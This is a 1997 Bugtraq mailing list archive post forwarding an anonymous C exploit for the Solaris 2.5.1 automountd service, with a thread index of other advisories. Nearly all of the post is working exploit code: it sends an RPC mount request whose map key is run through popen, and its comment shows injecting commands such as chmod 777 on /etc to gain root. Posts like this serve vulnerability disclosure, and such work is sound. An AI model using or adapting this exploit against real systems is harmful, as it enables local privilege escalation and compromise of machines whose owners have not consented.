Bugtraq mailing list archives

Solaris 2.5.1 automountd exploit (fwd)

From: aleph1 () DFW NET (Aleph One)
Date: Wed, 26 Nov 1997 02:02:13 -0600

From anonymous:

--

/*
 this is really dumb automountd exploit, tested on solaris 2.5.1
 ./r blahblah /bin/chmod "777 /etc; 2nd cmd;3rd cmd" and so on,
 map is executed via popen with key given as argument, read automount(1M)

 patch 10465[45] fixes this

 */

#include <sys/types.h>
#include <sys/time.h>
#include <stdio.h>
#include <netdb.h>
#include <rpc/rpc.h>
#include <rpcsvc/autofs_prot.h>

#define AUTOTS "datagram_v" /* XXX */

void usage(char *s) {
  printf("Usage: %s mountpoint map key [opts]\n", s);
  exit(0);
}

bool_t
xdr_mntrequest(xdrs, objp)
        register XDR *xdrs;
        mntrequest *objp;
{

        register long *buf;

        if (!xdr_string(xdrs, &objp->name, A_MAXNAME))
                return (FALSE);
        if (!xdr_string(xdrs, &objp->map, A_MAXNAME))
                return (FALSE);
        if (!xdr_string(xdrs, &objp->opts, A_MAXOPTS))
                return (FALSE);
        if (!xdr_string(xdrs, &objp->path, A_MAXPATH))
                return (FALSE);
        return (TRUE);
}

bool_t
xdr_mntres(xdrs, objp)
        register XDR *xdrs;
        mntres *objp;
{

        register long *buf;

        if (!xdr_int(xdrs, &objp->status))
                return (FALSE);
        return (TRUE);
}

main(int argc, char *argv[]) {
  char hostname[MAXHOSTNAMELEN];
  CLIENT *cl;
  enum clnt_stat stat;
  struct timeval tm;
  struct mntrequest req;
  struct mntres result;

  if (argc < 4)
    usage(argv[0]);

  req.path=argv[1];
  req.map=argv[2];
  req.name=argv[3];
  req.opts=argv[4];
  if (gethostname(hostname, sizeof(hostname)) == -1) {
    perror("gethostname");
    exit(0);
  }
  if ((cl=clnt_create(hostname, AUTOFS_PROG, AUTOFS_VERS, AUTOTS)) == NULL) {
    clnt_pcreateerror("clnt_create");
    exit(0);
  }
  tm.tv_sec=5;
  tm.tv_usec=0;
  stat=clnt_call(cl, AUTOFS_MOUNT, xdr_mntrequest, (char *)&req, xdr_mntres,
                (char *)&result, tm);
  if (stat != RPC_SUCCESS)
    clnt_perror(cl, "mount call");
  else
    printf("mntres = %d.\n", result.status);
  clnt_destroy(cl);
}

Current thread:

Solaris 2.5.1 x86 statd exploit Aleph One (Nov 24)
- r00t advisory [ Madden 97, Madden 64 ] [ Nov 25 1997 ] (fwd) X (Nov 24)
- Re: Solaris 2.5.1 x86 statd exploit Casper Dik (Nov 25)
- Cisco LocalDirector password loss: alert cancelled John Bashinski (Nov 25)
- CERT Vendor-Initiated Bulletin VB-97.14 - scoterm Aleph One (Nov 25)
- Solaris 2.5.1 automountd exploit (fwd) Aleph One (Nov 26)
- Potenial DOS in Windows NT RAS PPTP Kevin Wormington (Nov 26)